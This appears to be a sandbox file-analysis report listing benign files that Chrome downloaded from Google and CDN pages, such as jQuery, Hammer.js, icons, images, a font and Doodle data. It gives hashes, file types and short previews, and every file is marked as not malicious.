                                                                                                                                                                                                                                                            SHA1:F505AF59D6CD81DA9C153622F7F09ABE812073B6
                                                                                                                                                                                                                                                            SHA-256:254A7C313076C3CBD2A21E78C9C9762DBEDFF5F3D21CAC6090A8C4F67334E942
                                                                                                                                                                                                                                                            SHA-512:690AC84ED5CC5C3BB34CA3207401E601CD065CE8725AC5A50219962108F15BE64CAA09C8D2D07ECD159B2A32330F27A6061FA18027379D574200B9813AC68D2C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://about.google/assets-stories-2021/img/glue-icons.svg
                                                                                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg">. <defs>. <svg id="chevron-left" viewBox="0 0 24 24"><path d="M16.41 5.41L15 4l-8 8 8 8 1.41-1.41L9.83 12"></path></svg>. <svg id="chevron-right" viewBox="0 0 24 24"><path d="M7.59 18.59L9 20l8-8-8-8-1.41 1.41L14.17 12"></path></svg>. <svg id="expand-less" viewBox="0 0 24 24"><path d="M18.59 16.41L20 15l-8-8-8 8 1.41 1.41L12 9.83"></path></svg>. <svg id="expand-more" viewBox="0 0 24 24"><path d="M5.41 7.59L4 9l8 8 8-8-1.41-1.41L12 14.17"></path></svg>. <svg id="arrow-back" viewBox="0 0 24 24"><path d="M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.41L7.83 13H20v-2z"></path></svg>. <svg id="arrow-forward" viewBox="0 0 24 24"><path d="M12 4l-1.41 1.41L16.17 11H4v2h12.17l-5.58 5.59L12 20l8-8-8-8z"></path></svg>. <svg id="arrow-upward" viewBox="0 0 24 24"><path d="M4 12l1.41 1.41L11 7.83V20h2V7.83l5.58 5.59L20 12l-8-8-8 8z"></path></svg>. <svg id="arrow-downward" viewBox="0 0 24 24"><path d="M20 12l-1.41-1.41L13 16.17V4h-2v12.17l
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (20581)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):20765
                                                                                                                                                                                                                                                            Entropy (8bit):5.294839791503179
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:mb5vj+l3jfaksTAAvNWUwLATFqACns+CSHDJDLrx:i5vj+5jfSTtrTFqACs+CSHtD5
                                                                                                                                                                                                                                                            MD5:15065981497259D972918A646AB771E0
                                                                                                                                                                                                                                                            SHA1:F2DE8453FCCB34BAF26D784AFA965DBE8C0D1550
                                                                                                                                                                                                                                                            SHA-256:8A1B58D624EEB47E9E3073531A5D364E41A2E7853C052873A79917F97DD0BB44
                                                                                                                                                                                                                                                            SHA-512:38CA7D35BEC8C1E2F3E17EEE4048E724F84B7C44EF001AF83E3CA68281A7E3E77E132283FF3597BFB0069B2B3B5C73BA9C9AFEFB12793EEC2F501D5F13E6D7ED
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://ajax.googleapis.com/ajax/libs/hammerjs/2.0.8/hammer.min.js
                                                                                                                                                                                                                                                            Preview:/*! Hammer.JS - v2.0.8 - 2016-04-23. * http://hammerjs.github.io/. *. * Copyright (c) 2016 Jorik Tangelder;. * Licensed under the MIT license */.!function(a,b,c,d){"use strict";function e(a,b,c){return setTimeout(j(a,c),b)}function f(a,b,c){return Array.isArray(a)?(g(a,c[b],c),!0):!1}function g(a,b,c){var e;if(a)if(a.forEach)a.forEach(b,c);else if(a.length!==d)for(e=0;e<a.length;)b.call(c,a[e],e,a),e++;else for(e in a)a.hasOwnProperty(e)&&b.call(c,a[e],e,a)}function h(b,c,d){var e="DEPRECATED METHOD: "+c+"\n"+d+" AT \n";return function(){var c=new Error("get-stack-trace"),d=c&&c.stack?c.stack.replace(/^[^\(]+?[\n$]/gm,"").replace(/^\s+at\s+/gm,"").replace(/^Object.<anonymous>\s*\(/gm,"{anonymous}()@"):"Unknown Stack Trace",f=a.console&&(a.console.warn||a.console.log);return f&&f.call(a.console,e,d),b.apply(this,arguments)}}function i(a,b,c){var d,e=b.prototype;d=a.prototype=Object.create(e),d.constructor=a,d._super=e,c&&la(d,c)}function j(a,b){return function(){return a.apply(b,argumen
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Picasa], baseline, precision 8, 660x238, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):209779
                                                                                                                                                                                                                                                            Entropy (8bit):7.713145318670088
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:aRNRNRoD/G3VAW9Zi600000T5Z5+5+5rvAGe9p:aRNRNRyGFANII9vAGi
                                                                                                                                                                                                                                                            MD5:DB67E219012CF840418D1803DF203E1D
                                                                                                                                                                                                                                                            SHA1:EC6D20E8EA58A9AEF40DCA57F7E2E17FBB8CFD97
                                                                                                                                                                                                                                                            SHA-256:740FBFA475E148CD7368D0A65A69A1B579616661E8EC518789AADCFCDE5C03D9
                                                                                                                                                                                                                                                            SHA-512:F6F5D01E83BE5C51F708C1BD0DA26805E4BE9A31E7C50BA71F378A202FDE47F64D558A55A14DA0453DD9C82C313EEBE37BD2AF23D9658C7BEF9924274971EDE0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/R3qBk5xW_52Z6Rit39SW--TTlXpogLb7RCor5-tdRx7X6ykqM_0Lh0Rji5M6Oz1FLG8Paqh4aRabiP3JrlFPGal5R1P8MGlohZ0-753zbQ=s660
                                                                                                                                                                                                                                                            Preview:......JFIF.............*Exif..II*.......1...............Picasa......ICC_PROFILE......XKCMS....mntrRGB Lab .........2..acspMSFT....KODAsRGB........................KODA................................................A2B0...D...4bXYZ...x....bTRC.......B2A0......jcprt.......Gdmnd...L...wdmdd.......[gXYZ... ....gTRC.......lumi...4....wtpt...H....desc...\...zrXYZ........rTRC.......vued.......Fview...4...$mft2.....................................................g.......6.....Q.......O.(...........-.W.......k.....I.......\ .!.#.$X%.&.(.)A*x+.,.../I0{1.2.4.576d7.8.9.;.<6=^>.?.@.A.C.D:E\F}G.H.I.J.L.M5NQOmP.Q.R.S.T.V.W.X3YIZ_[t\.].^._.`.a.b.d.e.f'g6hEiSj`knlzm.n.o.p.q.r.s.t.u.v.w.x.y.z.|.}.~..........!.$.'.).*.,.-.........-.,.*.).&.$.!..........................................w.l.a.V.K.?.3.'.....................p.a.Q.@.0................~.k.X.D.1..............v.`.J.4.............{.c.J.2............h.M.3...........v.Z.>."...........u.X.:.........g.......6.....Q.......O.(
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):199293
                                                                                                                                                                                                                                                            Entropy (8bit):5.1611207634438765
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:lrWDo1t/zoNIeJIexcZJcdVd3hcMJWw/ODAzAnFHRpNnXOOPXnHvaK1:laDo1t/zolcZJcdVd3hcMJWw/ODAzAn3
                                                                                                                                                                                                                                                            MD5:C5F3C0B33AF453E8EFCA240168FB9C69
                                                                                                                                                                                                                                                            SHA1:27B8001C9ACB30F956B9F8D3E25C0AEC01DB4F7E
                                                                                                                                                                                                                                                            SHA-256:1F026E3986F8016DD7B7B482D67C4798377336C10D8FA82E085952338CC892C4
                                                                                                                                                                                                                                                            SHA-512:994AA006A1B4E61837D7998C30E408A0D72A96CCD6953C79D072D509B57AF1E28E943B15EE4D2413F17B985E9974C08CAF1B87301575E4BC1EAD6B8758917AB5
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/doodles/history/3/20?cb=initCarousel
                                                                                                                                                                                                                                                            Preview:/**/ initCarousel({"date": "2023-03-20", "hl": "en", "doodles": [{"name": "first-day-of-spring-2008", "title": "First Day of Spring 2008", "url": "//www.google.com/logos/2008/spring08.gif", "alternate_url": "", "high_res_url": "https://lh3.googleusercontent.com/FhIwYfdhqW6ygU9DnZnr2VCxVaIU6sivlBaa91wIuTB7cox40KZfT2EnyKjdCyute5w1ewVzc3N3G3DWFVngy0kFy2YC9JU7WlwUFmtj=s660", "high_res_width": 0, "high_res_height": 0, "run_date_array": [2008, 3, 20], "translations": {"en": {"query": "first day of spring", "hover_text": "Happy first day of spring!", "share_text": ""}, "zh-CN": {"query": "first day of spring", "hover_text": "First Day of Spring", "share_text": ""}, "nl": {"query": "begin van de lente", "hover_text": "Begin van de Lente", "share_text": ""}, "ja": {"query": "first day of spring", "hover_text": "First Day of Spring", "share_text": ""}, "ko": {"query": "first day of spring", "hover_text": "First Day of Spring", "share_text": ""}, "pt-BR": {"query": "primeiro dia da primavera", "h
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 1150 x 460
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):134596
                                                                                                                                                                                                                                                            Entropy (8bit):7.95531836625007
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:vRA7atBj7dtUeWJf8rzGsscTbr0c5+CtwNqiRWzHbUjQUZO:Zbtt7dQJf8rzG48cxtwNqiITbUjNO
                                                                                                                                                                                                                                                            MD5:49145BE38E9CC5299543EA80ABC2EDCB
                                                                                                                                                                                                                                                            SHA1:755BD53AAEBEACB7A78E0CFD24694DCA207F4B68
                                                                                                                                                                                                                                                            SHA-256:4CB4280AD13A6C2DC801349266820FCBE3C27FDDA90D5D0A8ACB3F1FFE49338A
                                                                                                                                                                                                                                                            SHA-512:028E01224570191BEE47FD5B5416C621A4625A1C658856F271DB2983AD472F4A97824549B39A8B48B395B4815A75B6A3B10F1C1013AAB4255CBFDA9DC527CB48
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:GIF89a~.........l..h....Z.................t......h.e.............e....o........q.......S....2Z..T..s.........K...............]....................................................................\.Aa...........).....js..............HT....y........%.......Qr....................&4...................3.......%.............b.............6D.................Yc...q...'............{...|........6....O.......l........................4]..F.........m.......|...Jq....e...................#@r....b.8\.....}.......k..i..e...Qm...m................}....................y..a.....m..............y..........................._a..........h.....................................................|.............C........@...m..............................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, baseline, precision 8, 384x140, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):35763
                                                                                                                                                                                                                                                            Entropy (8bit):7.9764156761230085
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:SAFnRQGJ6onwwaPKa2FISR8wZ/3iILZRT5zgbg1PVuE2RKLEDI8JyeT5oI1B:SAdRPJ6oxaP54ISFtimZRTK8BoEyKADL
                                                                                                                                                                                                                                                            MD5:42C9A73661A353AD5192B06C50107113
                                                                                                                                                                                                                                                            SHA1:CED850074C740BD2955A7272A5FE17E48F97AF3C
                                                                                                                                                                                                                                                            SHA-256:EADE235F29AB89318D3ED69F97E26FCCC88C2BECD873C82A3C9299A26ED5AA65
                                                                                                                                                                                                                                                            SHA-512:AF04C8504317B40AF015A9E4EF529CB39E6DA451157E769BAC1DB283D11AD8C28C41EA9F07AE840A5A5869B0AD38D3C622078369C1708493572E7BCA7275B9F8
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:............................................................................................................................................................................................................................................!...1.AQ"..a2.q..B#..R...br3..CSs$..c.4.u...6'7......................!..1A..Qa.q.."....2BR....br#......3C$..c.54............?........W..H.Lk..#i.<...S.k]..-%.U...u......a..n.wx....8q...k.b..h.\[..2.?<r.4...l..B.[u.Y.!k..-#Q...X.i0....(Xg..%....r;.).%\1..g..~...6..n....u..!..e.R......:........M...kKK.nn.........I_P..0F4.n.H..:... .c.....uw"...5<.h.....J.c.0......9......j..#.!#D..q..m.yd"4.K3u....1.6..@......M..+.9..5 .QSG...#....x....Q.8|;!.l..eGF.....z.#5..9}"%.kQ.0.....C....lt...@q..5..<A.FG.....q..223...6......~.....NB...j..8.W...\4..B...W.......`.f...y./..=e....0.....bG.eM!..-R....0.n..].......1%....L.F.q...:.<.....^.`V4...H.88.9..^..df222......FFT.##...#..df.zx..2<gT.T.}N5..F..q...,...t....V4.x..Ei..)*.z.(..O,p.......5^..-.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 1132 x 400
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):216988
                                                                                                                                                                                                                                                            Entropy (8bit):7.895211821926336
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:Fw8fF6ZU0Q6BMvzZPMZ3ZaZb2rXm9e81UYqImNWr5BkZ:SMZbZElcZc986YqIEuyZ
                                                                                                                                                                                                                                                            MD5:B6A6A23C2C5449859211639518CC6F8C
                                                                                                                                                                                                                                                            SHA1:744C1138950A454E7F34211978E020AD5E712006
                                                                                                                                                                                                                                                            SHA-256:56F83494607E0C6B6D7C703A864E04029CC42CBE4ABA96A3B6A624900DB9CCA2
                                                                                                                                                                                                                                                            SHA-512:01C5385424943A88B5E6A1B4A94C3660DB07A14FBDA707818B4079E0F8EAAF75BE9818E57E3E74DC3E0A97A26F0952C564BA3091DA44CDA321F0BCA1338C8BEA
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:GIF89al........M........._-.............F.(..%..:............<.......j...... ..oL............Q........-.3..O.....~...>.l....,.>.....U....B..........4.9.........2.9.......t....3.....I.....V...... ..=..t....E.l....,...;..5......B..W..........>.....q..E..`....)..0....k.....i..x....`...........;..O..Q......._.....2.....0....?....E...Q.S..o..,.,..}.=.......;...........:..w.......b..-..j..a......B....-.........Q....3....R..c..s.....s..8..W..Z.R.........|..Y....k.....:.&..%.....!..E....{..S....l..D.....z....Q..c..2..6..P..L.......B.G..w..9..O.P..R..........Q....W..[.....`..N..O..f...............J..s..X..d....`..T..[..I.....`....[..S........L....U.....e......................c..j.....j.!....5..T...!..NETSCAPE2.0.....!...*...,....l...@...)..H......*\....#J.H....3j.... C......k..T!.!..4$.fb)&..8s.....@...J...H.*.xm...I.0.J...T.41..... ..'......]...=,8@....x.........} .A..&9..R.....6.b.D.....c..d..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):124
                                                                                                                                                                                                                                                            Entropy (8bit):4.03524129740979
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:kn+8/ZoS8/ZoSISHq/ZoS8/ZoS8/ZoS8/ZoSoniK9nD/ZoS8/ZYn:kn+8/ZoS8/ZoSfq/ZoS8/ZoS8/ZoS8/Q
                                                                                                                                                                                                                                                            MD5:42F85DFC30589BDAF561F73E5C3F816F
                                                                                                                                                                                                                                                            SHA1:2AE4AA83B43E58A0EB09B9490B58C8A106E05C4C
                                                                                                                                                                                                                                                            SHA-256:D5304477316C87C6BA23ED536D67B44C0A9B6FB64900C8E8D4A6C092FFC36A81
                                                                                                                                                                                                                                                            SHA-512:B3ACDECA1F7B92A1062D98B11D5C760B77327D841E2D06BC327403F7298CC50582DB9C8C7D22F3C5215B155F763C98E9D4CB3C6BCDF76D97E470E1BE8532DCAD
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTA0LjAuNTExMi44MRJPCQ8CJ4c8slTPEgUNkWGVThIFDZFhlU4SBQ0G7bv_EgUNkWGVThIFDZFhlU4SBQ2RYZVOEgUNkWGVThIFDSANMagSBQ2RYZVOEgUNkWGVTg==?alt=proto
                                                                                                                                                                                                                                                            Preview:CloKBw2RYZVOGgAKBw2RYZVOGgAKBw0G7bv/GgAKBw2RYZVOGgAKBw2RYZVOGgAKBw2RYZVOGgAKBw2RYZVOGgAKBw0gDTGoGgAKBw2RYZVOGgAKBw2RYZVOGgA=
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (32012)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):69597
                                                                                                                                                                                                                                                            Entropy (8bit):5.369216080582935
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:qNhEyjjTikEJO4edXXe9J578go6MWX2xkjVe4c4j2ll2Ac7pK3F71QDU8CuT:Exc2yjq4j2uYnQDU8CuT
                                                                                                                                                                                                                                                            MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                                                                                                                                                                                                                            SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                                                                                                                                                                                                                            SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                                                                                                                                                                                                                                            SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                                                                                                                                                                                                                                                            Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):1554
                                                                                                                                                                                                                                                            Entropy (8bit):4.133417333200851
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:tV0U/S903tFQRhYj45kRHDu9+u1lUetmCmifvqbbLaHu9HGn1u1lIdUWA/jTq9Kr:Z/S90PU5I1YdtmMqPLmum1YUUZ/jTq98
                                                                                                                                                                                                                                                            MD5:C5B92D70540100ACBE7A089EDD4AD521
                                                                                                                                                                                                                                                            SHA1:289EDD48A26448C16B24D8CEE077891AC256B63C
                                                                                                                                                                                                                                                            SHA-256:C2193804A202EB72C93FC3B18733063DA2FC140C1991AD624980C836AFD61D27
                                                                                                                                                                                                                                                            SHA-512:84244179B2669C0113F00FAADF2C4539F68DADD880A2E36149A31849AB3C654FE98F3FF3FDB1483438CC970FD25E29B35A85E7BE0F1B5CC490C3DCD249FD35A7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://about.google/assets-stories-2021/img/glue-google-solid-logo.svg
                                                                                                                                                                                                                                                            Preview:<svg id="google-solid-logo" width="74" height="24" viewBox="0 0 74 24" xmlns="http://www.w3.org/2000/svg"><path fill="#5f6368" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24zm15.76-2c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52zm28.58-8.03h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3.52 1.74 0 3.1 1.5 3.1 3.54.01
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 9092, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):9092
                                                                                                                                                                                                                                                            Entropy (8bit):7.9776635189830944
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:T0NDQphvaIQC0xBhMRNr7Y+ouPA7fK62jUSuS:T8DedQC0tMRNr7Yh7KBQST
                                                                                                                                                                                                                                                            MD5:34131C33B88C37DC81090CFBDF275C5F
                                                                                                                                                                                                                                                            SHA1:9F2A73B634929FA8029C74B33E2BA648142756D6
                                                                                                                                                                                                                                                            SHA-256:A68F30FCFB2D3DCBD1BD54B8D9B81E38B26CB92FEC368CF4C1ACC5A5CB19C4E1
                                                                                                                                                                                                                                                            SHA-512:5195E785465E466577888DFDAA2A14AD2A5A29F1CE895629D3A30F96CEA11D474185E454C314244469E418D7D7F21589676FE7B0E845D8D797E0F4A18C11E737
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/googlesans/v45/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPi0UvaYr.woff2
                                                                                                                                                                                                                                                            Preview:wOF2......#.......Ad..#................................f?HVAR..`?STAT..'..L/<....l.[.f.0.n.6.$..H. ..>. ....;E.b.8..ql;......Au[.l..A5i.va.8.|.=......<a=.{\...D.R..^zk.W.....]9..V..h}.p..%..!N..l~..D.M.........ti.$..|....>r..G..F..!d.f.i4.&.wx..?..;..S.D$Db...A.........~E........S...(M...}H.W.O..+..K..?\.,.z..$=.F..N.....(6...ii..S.e...6.[.E.2..}.N..=......&..r..P.....^.......$.c&3....|.?4yHv..|..%_..)Rw.K.>...C4..-.I@...9.....WzB...D.b...5._`....}u/.....T........=......>vq...>.....6.vFs .z.'<w....RRT.pSBQg4+.}.z}y....t.>\Yv....d..;..F....0T..Uy).l..M^..K..........r....c....F^..^6\3.p.ey8.H...uk.4.J..YEF..2]..I.(g.d.dJLj.E...wy...%$`.~....<.n...A......}(.p`.sqa..>/.gs...~.,h..<...U...8...o........W...h.KF.....@..e!F.. ......f..>KC.....].2...n........&[..:u..P.5....5..>..y.|z....}.;;..$...T.qf...\|.=.r.vj.X.>r..].-..3....o.....u..R....nS..Ph..|.!.p..HEsa;...E.v.qeg\..X.........0L+...q..as.R.4..1.Aj.:#...u.n.x.Qt@...X.....j$...........H.*
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1143)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):4272
                                                                                                                                                                                                                                                            Entropy (8bit):5.407649241930215
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:bVcC0LhyRs71268NYZOAx/rfuNfnAZe5PwGNHW:B3qhpRByNPx54GN2
                                                                                                                                                                                                                                                            MD5:B427175FA1078775EB792756E7B6D1E7
                                                                                                                                                                                                                                                            SHA1:4C55C0233D3D9002B3449C025F97821F8BB8900D
                                                                                                                                                                                                                                                            SHA-256:EE147E859AD0F09AA50367974E38AB53E7C7054C4A51D400A7F45B0EB251454F
                                                                                                                                                                                                                                                            SHA-512:AF8D384188363378BC99C2E51523E74E1D18BA77D51BFF7647A377A117499421F9E94477E09907925E46DAD0A908B799A616D0B4855FFFF064BA6350815063D3
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/cv/js/sender/v1/cast_sender.js
                                                                                                                                                                                                                                                            Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.'use strict';var l=function(){var a=h,b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},m=this||self,n=/^[\w+/_-]+[=]{0,2}$/,p=null,q=function(a){return(a=a.querySelector&&a.querySelector("script[nonce]"))&&(a=a.nonce||a.getAttribute("nonce"))&&n.test(a)?a:""},r=function(a,b){function e(){}e.prototype=b.prototype;a.i=b.prototype;a.prototype=new e;a.prototype.constructor=a;a.h=function(c,g,k){for(var f=Array(arguments.length-2),d=2;d<arguments.length;d++)f[d-2]=arguments[d];.return b.prototype[g].apply(c,f)}},t=function(a){return a};function u(a){if(Error.captureStackTrace)Error.captureStackTrace(this,u);else{var b=Error().stack;b&&(this.stack=b)}a&&(this.message=String(a))}r(u,Error);u.prototype.name="CustomError";var v=function(a,b){a=a.split("%s");for(var e="",c=a.length-1,g=0;g<c;g++)e+=a[g]+(g<b.length?b[g]:"%s");u.call(this,e+a[c])};r(v,u);v.prototype.name="Asse
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Algol 68 source, ASCII text, with very long lines (555)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):9615
                                                                                                                                                                                                                                                            Entropy (8bit):5.14255469904016
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:6YFNEs7pLZc0VsNYNkc/LcTD35uCamXDsr7akh6tporMlbt2A5/rQm0CHck:6Y8s7p1sH753jXDsrVh6tpfhtpqCD
                                                                                                                                                                                                                                                            MD5:99C2F70A68B9105E6DE1D8AAECDA635F
                                                                                                                                                                                                                                                            SHA1:1C58A7F05D5D8579F6F1A6F73A9919E941C67DD8
                                                                                                                                                                                                                                                            SHA-256:498B3F2A0357FBD50A80EB18B23AB4B461B791D640E5560B799F08ED960748A9
                                                                                                                                                                                                                                                            SHA-512:7870BDFC031AB09D974CF6ECC48532E4CF3E7CF9A98283352646489CE92F35DA5A498141625BB8291849F2757E12929DF36B84134FED4D6494C0D4E6C8A50799
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.youtube.com/s/player/59acb1f3/fetch-polyfill.vflset/fetch-polyfill.js
